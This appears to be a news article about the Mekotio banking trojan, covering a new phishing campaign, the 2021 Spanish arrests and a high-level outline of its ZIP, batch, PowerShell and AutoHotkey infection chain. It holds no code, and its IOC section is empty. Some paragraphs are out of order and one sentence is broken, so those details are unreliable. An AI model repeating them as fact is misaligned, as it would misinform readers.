According to reports, the latest round of attacks is particularly targeting victims in Brazil, Chile, Mexico, Peru, and Spain.Check point researchers reported that , “One of the main characteristics […] is the modular attack which gives the attackers the ability to change only a small part of the whole in order to avoid detection.”
The development comes after Spanish authorities arrested 16 members of a criminal network in July 2021 in connection with the operation of Mekotio and another banking virus named Grandoreiro as part of a social engineering campaign targeting European financial institutions.
The arrests were made in Ribeira (A Coruña), Madrid, Parla and Móstoles (Madrid), Seseña (Toledo), Villafranca de los barros (Badajoz), and Aranda de Duero (Burgos) following a year-long investigation codenamed “Aguas Vivas”.
The Mekotio banking trojan’s operators have reappeared with a change in infection flow in order to remain undetected and avoid protection software while undertaking nearly 100 attacks in the last three months.
Computers, phones and documents were seized over 1,800 spam emails were reviewed, allowing law enforcement to successfully stop transfer efforts totaling €3.5 million. The actors are reported to have made €276,470 from the campaign of which €87,000 has been successfully recovered.
The virus, codenamed “Mekotio” and “Grandoreiro,” worked by intercepting transactions on a banking website and diverting funds to accounts controlled by the hackers. In order to facilitate such fraudulent transactions, at least 68 government email accounts were hacked.
“The money was then divided by sending it to different accounts or withdrawing it.”
The Mekotio malware strain has grown to be capable of infecting Windows PCs as awaiting tax receipts and includes a link to a ZIP file or a ZIP file as an attachment. When you open the ZIP archive, a batch script is executed, which then executes a PowerShell script to download a second-stage ZIP file.
An AutoHotkey (AHK) interpreter, an AHK script and the Mekotio DLL payload are all contained in this additional ZIP file, which runs the DLL payload to harvest passwords from online banking sites.
Finally Check point’s Kobi Eisenkraft concluded that “As a result, the arrests put a stop to the Spanish gangs’ activities, but not to the primary cybercrime groups behind Mekotio.” The Mekotio banker represents a very real risk of obtaining usernames and password in order to access to financial institutions.
Indicators of Compromise
Links to first zip